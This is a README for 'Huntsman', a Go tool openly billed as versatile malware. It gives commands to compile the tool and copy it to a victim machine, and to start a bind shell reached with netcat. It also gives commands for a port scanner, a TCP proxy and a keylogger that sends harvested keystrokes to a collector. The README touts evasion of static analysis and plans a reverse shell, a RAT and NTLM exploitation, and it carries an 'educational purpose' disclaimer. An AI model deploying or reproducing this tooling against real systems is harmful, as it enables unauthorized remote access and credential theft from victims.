Huntsman
A versatile and highly concurrent malware written in Golang.
https://souvikhaldar.github.io/huntsman/
NOTE - This software is built for educational purpose. I’m not responsible for any kind of loss/inconvienience caused to anyone using this software.
Abstract
The term Malware is an acronym for Malicious Software, which is software that is used to harm or exploit any electronic device or network, causing chaos. Programming is the way of writing down thoughts and logic, in a way the computers can understand, and while writing a program there is always a scope of introducing errors and flaws or missing out on potentially dangerous scenarios. These flaws in the program are what hackers call vulnerability, and they exploit these bugs to make it behave in a way the programmer never intended. Malware is the way hackers talk to the computer to satisfy this goal. Hence, writing malware is an art to exploit the error in thinking. Huntsman is a malware, which was created keeping speed and efficiency in mind because at the end of the day malware is also a software, a malicious one. Huntsman in written in a language called golang and below are the highlights of what makes it a special kind of malware:
-
Fast and concurrent: Our CPUs are not getting any faster as Moore’s law is dead, hence the way we can improve on processing is by reducing the latency introduced by I/O operations by adding more and more cache memory and using multiple CPUs instead of one. But, both these factors have a limit as to how large the cache can be and how many cores can be added. Hence software can be made faster by concurrently running pieces of a process (called thread). Golang takes care of this aspect well and hence Huntsman can be said to be an efficient concurrent software.
-
Single executable binary: Once you find a vulnerability in a system and want to exploit it using a malware, you need to reduce the time required to place the binary at the intended place. Hence having a single binary can that execute on the system is very useful as you can there is nothing else to take care of. You just place it there and start exploiting, no dependencies involved!
-
Cross-platform: The target system can be of any architecture and be running any operating system, hence is it important that the malware should be capable enough to run on most of them. Hence the true cross-platform nature of golang comes into the picture as Huntsman can be compiled into almost any platform of choice and it will be ready to execute in no time.
-
Versatile: Huntsman is not just one kind of malware, it is a versatile malware that can perform many kinds of malicious activity. The goal behind making huntsman versatile was that once we get access to a system, we should be able to exploit it to maximum extent and maximum possible ways. For a complete set of features refer to the feature section.
-
Static analysis proof: A program written in golang is very hard to reverse engineer, and hence it is safe from static malware analysis to a large extent. Hence huntsman is hard to get caught very easily.
Complete guide
1.Installation
2.Bind Shell
3.Concurrent port scanning
4.TCP proxy
5.TCP Listener
6.Keylogger
Inspiration
The inspiration of this tool are primarily the following two sources:
- Pursuing Advanced Exercutive Program in Cyber Security and Cyber Defense at the esteemed c3i institution of IIT Kanpur and Professor Sandeep Shukla, Rohit Negi and Anand Handa, who helped take baby steps in cyber security world.
- The excellent book Black Hat Go: Go Programming For Hackers and Pentesters by Tom Steele, Chris Patten and Dan Kottmann.
Path
- Port scanner
- HTTP traffic analyzer
- TCP proxy
- TCP listener
- HTTP server
- Reverse Shell
- Keylogger
- SMB and NTLM expotation
- Abusing Databases
- Packet processing
- Fuzzing and shellcode
- Cryptography
- Windows system analysis
- Steganography
- CNC RAT
Complete Guide
Installation
There multiple ways in which you can install huntsman
on your machine or a target machine.
-
Install it using golang compiler using
go install
orgo build
- Install Golang
git clone git@github.com:souvikhaldar/huntsman.git
cd huntsman
go install
-
Download the binary for you system from RELEASES and save it on on
$PATH
.- Downloading using
wget
:wget <huntsman_xyz.tar.gz
- Untar it using
tar -xf <huntsman_xyz.tar.gz
- Place the
huntsman
binary executable somewhere on $PATH, egsudo mv huntsman /usr/local/bin
- Downloading using
Transfer to a target
Once you’ve compiled huntsman for the target OS and arch, you can transfer it
using scp
or any tool of choice, for exploiting the victim.
Eg, transfering linux binary to target machine:
scp ./download/linux_amd64 username@address:location
Fast concurrent port scanning
huntsman portscan --help SIGINT(2) ↵ 5295 10:30:46
Concurrently scan the provided range (by default 0 to 65535) to check if any port is open
Usage:
huntsman portscan [flags]
Flags:
-e, --end int32 last port number (default 65535)
-h, --help help for portscan
-s, --start int32 starting port number (default 1)
--target string IP/URL address of the machine to be scanned
-t, --threads int32 the number of goroutines to execute at a time (default 100)
Example:
huntsman portScan --target abc.com
Run a TCP proxy
huntsman proxy -s <local-port> -t <target-address> -p <target-port>
Run a TCP listener
huntsman listen --port=<port>
Bind Shell
First you need to compile the binary for the target machine using the
goinstaller.py
or anything of choice. Then preferably use scp
to transfer
the binary to the target machine (see Installation
section) then execute it
using ./<binary-name> bindshell --port <port-number>
. Now the listener is
running to which you will be sending instructions to execute.
We will be using netcat as the client for
sending the commands over the network.
nc -nv <address-of-target> <port-number>
Youtube link for the video demonstration
Keylogger
A keylogger can log the keystrokes made by a user ,typically on a website. The logged keystrokes most of the times are crucial credentials of the users. Hackers use Credential Harvester (like keylogger) to steal your credentials.
Huntsman is the tool that contains a keylogger as well.
Eg. huntsman keylogger -w localhost:8192 -l 8192
This video is the demonstration for using huntsman as a keylogger. Link to youtube video